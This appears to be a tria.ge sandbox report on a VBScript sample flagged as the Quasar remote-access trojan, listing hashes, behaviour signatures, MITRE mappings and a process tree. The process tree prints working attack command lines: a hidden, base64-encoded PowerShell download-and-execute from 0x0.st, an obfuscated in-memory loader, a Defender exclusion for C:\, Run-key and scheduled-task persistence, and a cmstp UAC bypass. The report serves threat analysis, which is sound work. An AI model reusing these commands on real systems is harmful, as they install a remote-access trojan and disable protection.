Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
30/01/2025, 08:58
Static task
static1
Behavioral task
behavioral1
Sample
4.vbs
Resource
win7-20241010-en
General
-
Target
4.vbs
-
Size
272KB
-
MD5
46cb37a9ab59dfa43f3e4412c9482837
-
SHA1
4409a0080e076e663e8da28a02c1e3ced1f39ba9
-
SHA256
b6a92aac9266f84cded9a49758a8f40221c9d6f424dd6408c83e7d44d548f4ae
-
SHA512
7e186b8b077d9ad0f71dad3663d0c5ad283da8e7b242b53f482e2a54b3a32ef0a9c12a599baaf514a4231cb9dbf800f956066ecd0a563361ad2e1af461526219
-
SSDEEP
6144:xwP7sgNytypIj9WuIUaZ8z7zC2rPKwBEf+2y/twjgqM5NAq:y7syytHs3UoK2wB++2yu4
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/4172-99-0x00000000085B0000-0x000000000860E000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
flow pid Process 2 2448 powershell.exe 15 4172 powershell.exe 18 4172 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2448 powershell.exe 1792 powershell.exe 4172 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 1448 google.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\googlecmd\google.exe powershell.exe File opened for modification C:\Program Files (x86)\googlecmd\google.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language google.exe -
Kills process with taskkill 1 IoCs
pid Process 2736 taskkill.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2448 powershell.exe 2448 powershell.exe 1792 powershell.exe 1792 powershell.exe 4172 powershell.exe 4172 powershell.exe 1448 google.exe 1448 google.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 2736 taskkill.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 1448 google.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 3620 wrote to memory of 1824 3620 WScript.exe 82 PID 3620 wrote to memory of 1824 3620 WScript.exe 82 PID 1824 wrote to memory of 2408 1824 cmd.exe 85 PID 1824 wrote to memory of 2408 1824 cmd.exe 85 PID 2408 wrote to memory of 2448 2408 cmd.exe 87 PID 2408 wrote to memory of 2448 2408 cmd.exe 87 PID 2448 wrote to memory of 1540 2448 powershell.exe 91 PID 2448 wrote to memory of 1540 2448 powershell.exe 91 PID 1540 wrote to memory of 2784 1540 csc.exe 92 PID 1540 wrote to memory of 2784 1540 csc.exe 92 PID 2448 wrote to memory of 4868 2448 powershell.exe 93 PID 2448 wrote to memory of 4868 2448 powershell.exe 93 PID 2408 wrote to memory of 4104 2408 cmd.exe 99 PID 2408 wrote to memory of 4104 2408 cmd.exe 99 PID 2408 wrote to memory of 4172 2408 cmd.exe 100 PID 2408 wrote to memory of 4172 2408 cmd.exe 100 PID 2408 wrote to memory of 4172 2408 cmd.exe 100 PID 4172 wrote to memory of 3148 4172 powershell.exe 101 PID 4172 wrote to memory of 3148 4172 powershell.exe 101 PID 4172 wrote to memory of 3148 4172 powershell.exe 101 PID 4172 wrote to memory of 1448 4172 powershell.exe 103 PID 4172 wrote to memory of 1448 4172 powershell.exe 103 PID 4172 wrote to memory of 1448 4172 powershell.exe 103
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\owqt1u4w\owqt1u4w.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB40E.tmp" "c:\Users\Admin\AppData\Local\Temp\owqt1u4w\CSC74624E7ED6AC443AABF5829D233CDA27.TMP"6⤵PID:2784
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\jhxemqt5.inf5⤵PID:4868
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f4⤵
- Adds Run key to start application
PID:4104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gbW9jcW5xaWtkZXZ3bm94amp1Z29seHh1YnJwaG5pcWZtaHpkeXNvZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ1U2a0N0bnR6QTB2ZkwxQmhkZ2lHNWZTb1NjckcxQmVuMXhIOVlYeUExbkk9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCd3S0hDbDVKSWZtWFVxdmRmNG8zRXZ3PT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGVuYWN5ZGd0Z2tmdmp5bW9xaXB3YWJ4dW9wamZvdGtyZ2FqeXd2dnkoJHBhcmFtX3Zhcil7CUlFWCAnJGt3YWRkdndvdmtucWNzZmRwZ29qdGFmbXo9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckbnBqb25zdm1ybGVhdHJ0dHZrZGd1cG52Zz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGlxaG1lanJvZHBnbnpoc3JkbGdiZHdwdXA9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygka3dhZGR2d292a25xY3NmZHBnb2p0YWZteiwgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkaXFobWVqcm9kcGduemhzcmRsZ2Jkd3B1cC5Db3B5VG8oJG5wam9uc3ZtcmxlYXRydHR2a2RndXBudmcpOwkkaXFobWVqcm9kcGduemhzcmRsZ2Jkd3B1cC5EaXNwb3NlKCk7CSRrd2FkZHZ3b3ZrbnFjc2ZkcGdvanRhZm16LkRpc3Bvc2UoKTsJJG5wam9uc3ZtcmxlYXRydHR2a2RndXBudmcuRGlzcG9zZSgpOwkkbnBqb25zdm1ybGVhdHJ0dHZrZGd1cG52Zy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGpiZm9hbHhsaHhndmFmbHJiamN3bnllaHV6dWhldG9xcW54KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckeXFiZ2V5Ym5pZmJvYW5ibW1wYm1ndmNrcHFlZ3VkbGJtd2Z0cGl6cj1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGV6cWJyZGR4Zm9xZ25pamRucXJvdXV0ZnRhY2RoaXdlcWppZ2VhdGxuZ2JnbWZuZW1jPSR5cWJnZXlibmlmYm9hbmJtbXBibWd2Y2twcWVndWRsYm13ZnRwaXpyLkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGV6cWJyZGR4Zm9xZ25pamRucXJvdXV0ZnRhY2RoaXdlcWppZ2VhdGxuZ2JnbWZuZW1jLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kc3pxaW1zY3lob2dsbWtvdGxxdXNpdGZvdSA9ICRlbnY6VVNFUk5BTUU7JGh0Z3h1YXJtdGtibGN2ZnpxaXp0dmRidnIgPSAnQzpcVXNlcnNcJyArICRzenFpbXNjeWhvZ2xta290bHF1c2l0Zm91ICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaHRneHVhcm10a2JsY3ZmenFpenR2ZGJ2cjskZ2NodGs9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRodGd4dWFybXRrYmxjdmZ6cWl6dHZkYnZyKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeGt0IGluICRnY2h0aykgewlpZiAoJHhrdC5TdGFydHNXaXRoKCc6OicpKQl7CQkkZXJrZm89JHhrdC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kc255cmdodnF0dWJrbmFlaHRreXJodGh0Z2JuZ2FodXFybnk9W3N0cmluZ1tdXSRlcmtmby5TcGxpdCgnXCcpO0lFWCAnJHR6ZGZmZ21memFjdHpua3pneGF2emZma2Z1b3BtemtzYWNrPWVuYWN5ZGd0Z2tmdmp5bW9xaXB3YWJ4dW9wamZvdGtyZ2FqeXd2dnkgKG1vY3FucWlrZGV2d25veGpqdWdvbHh4dWJycGhuaXFmbWh6ZHlzb2YgKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkc255cmdodnF0dWJrbmFlaHRreXJodGh0Z2JuZ2FodXFybnlbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckaXFlc2x2bmh0ZGhuc3BobnRycnpvdXNhbHJ3dGFwa3R4Y2M9ZW5hY3lkZ3Rna2Z2anltb3FpcHdhYnh1b3BqZm90a3JnYWp5d3Z2eSAobW9jcW5xaWtkZXZ3bm94amp1Z29seHh1YnJwaG5pcWZtaHpkeXNvZiAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRzbnlyZ2h2cXR1YmtuYWVodGt5cmh0aHRnYm5nYWh1cXJueVsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtqYmZvYWx4bGh4Z3ZhZmxyYmpjd255ZWh1enVoZXRvcXFueCAkdHpkZmZnbWZ6YWN0em5remd4YXZ6ZmZrZnVvcG16a3NhY2sgJG51bGw7amJmb2FseGxoeGd2YWZscmJqY3dueWVodXp1aGV0b3FxbnggJGlxZXNsdm5odGRobnNwaG50cnJ6b3VzYWxyd3RhcGt0eGNjICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4172 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "google" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3148
-
-
C:\Program Files (x86)\googlecmd\google.exe"C:\Program Files (x86)\googlecmd\google.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2736
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
855B
MD5edd2dbe217449efdef8d69f8aaba4d78
SHA1661c16851dcf8d9f0ac1dfff01b9bea09e7b8460
SHA25679385e7a6aae35d5a065c28dc01afced3d707086f67a9f4b18f3690eed15bbee
SHA5124086f1692b7bfe297c66cb00ad92839f8000bdb6dcdc4fd44bc13119455038b0f99ca0b6a23f899ebbcc0a953fc8f2ef03c2fc721908edf3276e5028e4a03c50
-
Filesize
1KB
MD54f87a8a31cd965f514ab826e94a10bea
SHA14f26f8362309bc0e5b7f951043c7092414ea6142
SHA25601a123987d096e8de60e44dd60263fc539979d63583a3bac29402c49ae0889d3
SHA51238e627384997ad3860bf06d70213e13c62e47d06e46a5f74b2923e7ef03980421ee6112940d3a54f7ccd19c00458b5c7b2fe1ce7763b942d0933a1545ef78699
-
Filesize
1KB
MD5c61bb70030f80d54bb201f14bb53c973
SHA190edaade3f12a25dab3157d3f108b9a45a9a5f85
SHA2569222a45036b9abaaedf6d6c4ac384a10eaa86c22bacf20a8811e2de19137a0e8
SHA51250e8c42ad331c88753093a555229551a4b6475afbf0ea0e8d73dd4d7eaab9fd22fd08118e9560481609174a507e48ba7e4a6cdadb934ec15e0afbeedb79418a8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
264KB
MD548ef1bec452f6cbb0c43cad8e15c822d
SHA17709389fe88ac8498d6121367ef2ede187c6f2e2
SHA256b34c6ad373f346592e7a941cb11d8bd099df64d4fbb646f90d0aed9411804fe1
SHA512ed8f0b833aab924c1dfe02ca36ce57ec2ecc4ab17a93d3c0cb9a5597c444b743378be63c725574bf40157b04834ed95c5763bae22bc7bc5097ad6c5007b5c589
-
Filesize
4KB
MD5874d542531f86ccd7714dccd028cc024
SHA14a5a31bc56433ae8c88cbc76acc871ff70768fe2
SHA256e7632c236e84853bf3af422d7e49d435821cc86d4ab1cd25042049ea4d40605e
SHA5129da2522b425ab64ed3a76e85c87b73b8f0c19d22ea7394bf134583224cd1c83c8676dc636fe16989a372a3d80e66ee5e06a8e44926d4e1d84c341f8f9db331c3
-
Filesize
667B
MD505662b83ff7db6317e391454787598d8
SHA1d290d661e282eb757a5292fe5ee8f2f8517232ab
SHA2560322b78214d9fb1d40d9bf162a44f9a5fe13fcb21c96b8b0f0e289e939a9fa5c
SHA512f1b302c58804c79e350cd2f30a2f08f762551cc8790ed3f0b877efd8915996587734afe9f0b4185cfbbcf589aa9b04762dd80d9d8141a5bf647de692299161e9
-
Filesize
652B
MD52ce9266086efb74d2f3e6fc157dfcacc
SHA1981b0fc966bd44af8a1679b513302020cd7f1c82
SHA256063325c051c8f16c4e35df2aa72c9454ff6c9f45c28c203c6ed4f69ad7404426
SHA5127aa305539c209beee31ff9938a2596b953757ca589a3195159f14c830d270aea327b650021dc2de83b96dba22aa5b3d5e5b792279d17353904650db303bb19ed
-
Filesize
2KB
MD5b126ac3da39ffa35cb857267cbc70cbb
SHA159dbfa9af3f2fa2c3bda0118ef779c0238675721
SHA2566e6dd39153a84b94b4f309a4c4521260cbdd8a6922ade46096f42da39bc20b93
SHA512c15d8ef56529792b983d55736c283ad6ae5c95bcd661053292f95c51f535109e4c59cf391e1c724be97e52ee4bfa213a380021f51c4e576201c03cfc4647acbc
-
Filesize
369B
MD5e93b575152aa0dfdba463229a07f9cba
SHA19df4d58b4bbe1c7a1a678e6aaa50563928d08743
SHA2561081d6ac72c59e8b0fa988050c272da03db774b681b5d7e9e41b3bca07d106d4
SHA51228f151360e09981a3f71a4a82b4343db909db37a0b8a8aa6efd00eee036537323ad2fcfb7c291f637abf7929c62973d36f8b601512f6c5f8bf050a7ef582867a